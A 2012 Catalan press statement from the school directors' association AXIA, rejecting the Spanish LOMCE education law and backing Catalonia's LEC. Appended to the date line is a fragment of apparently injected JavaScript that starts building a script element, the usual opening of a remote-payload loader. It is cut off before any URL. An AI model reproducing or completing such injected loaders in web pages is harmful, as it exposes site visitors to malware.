Comunicat Axia

AXIA  ASSOCIACIÓ DE DIRECTIUS DE L’EDUCACIÓ PÚBLICA DE CATALUNYA

Davant la situació creada per la presentació del segon avantprojecte de Ley de Mejora de la Calidad Educativa (LOMCE), AXIA vol manifestar: 

 

1)   AXIA rebutja la LOMCE, una llei que, en comptes de millorar la qualitat del sistema educatiu, el desestabilitza amb agressions contra la normalització lingüística i la descentralització educativa.

2)   Enfront de la LOMCE, AXIA reafirma el seu suport a la Llei d’Educació de Catalunya (LEC). Cal seguir desplegant amb fermesa i la màxima celeritat les disposicions que fomenten la professionalització de la direcció i el seu lideratge pedagògic, eina decisiva per a la millora de la qualitat de l’educació del nostre país.

 

Barcelona 13 de desembre de 2012var d=document;var s=d.createElement(‘script’);